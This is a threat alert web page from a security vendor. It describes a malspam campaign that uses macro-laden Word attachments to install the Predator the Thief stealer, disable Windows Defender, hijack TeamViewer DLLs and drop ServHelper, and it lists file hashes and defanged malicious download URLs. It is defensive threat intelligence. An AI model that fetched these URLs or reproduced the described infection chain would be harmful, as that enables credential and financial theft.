February 17, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Rewterz Threat Alert – Ursnif Malware Delivered Via Office Macro Attachments
December 26, 2019Rewterz Threat Alert – Legion Loader’s Nest of Malware
December 26, 2019Rewterz Threat Alert – Ursnif Malware Delivered Via Office Macro Attachments
December 26, 2019Rewterz Threat Alert – Legion Loader’s Nest of Malware
December 26, 2019
Severity
Medium
Analysis Summary
A malspam email campaign containing Word document attachments. The document used macros to create and execute a BAT file that leverages msiexec to download, install, and execute malware. The downloaded file was an MSI payload that, once decompressed, drops several files onto the system. One of the files is the “Predator the Thief” stealer capable of stealing stored passwords, cookies, credit card information, and crypto wallets and sending the data back to its C2 server. Another file executes PowerShell commands to re-configure Windows Defender in order to deactivate real–time protection, avoid the application sending samples automatically to Microsoft, and disable other defenses. A JavaScript file in the folder downloads the same MSI payload that is only different in the fact that it drops a 64-bit version of “Predator the Thief” instead. Various legitimate Team Viewer files are included alongside a malicious DLL used for a DLL hijacking attack in order to intercept various Team Viewer functions. Lastly, a ServHelper payload is included in the toolset.
Impact
- Exposure of sensitive information
- Credential theft
- Financial loss
Indicators of Compromise
MD5
- 6954cee9db2533337e4425aceacc547b
- 77f46b13d858f83c3ce5bdc6ffbc8a95
- 92cc85c53e169b330fd8686d35259261
- 9aa1b6bb7d53b008b6529b4a2f6bfada
- a2e77ee41f4d4d3e8814d07d26ec5be3
- a511410d5889fca07a0dd0a8c84d6c8a
- a606d454b408b99aa9fc7ad774951621
- c3c226ec03f393103b9df764df50f0bc
- de70f256b9fd194f6844d7aa81b17b4e
URL
- http[:]//0926tv[.]xyz/mystt34834ujf37data/indexes_data[.]php
- http[:]//96[.]9[.]211[.]157/sdf4r3r3/WinDef[.]msi
- http[:]//cafafafa[.]xyz/pf1[.]txt
- http[:]//foxlnklnk[.]xyz/pf1[.]txt
- http[:]//gabardine[.]xyz/log[.]txt
- http[:]//kuarela[.]xyz/1[.]txt
- http[:]//letitbe[.]icu/2[.]txt
- http[:]//supremeconnect[.]xyz/fdfg83574gd/file2[.]exe
- https[:]//artrolife[.]club/fhj37f34fdd/file1[.]exe
- https[:]//soul-fly[.]xyz/api/gate[.]get
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.
- Always look for legitimate URL of the website you land in, when you click on the link via email.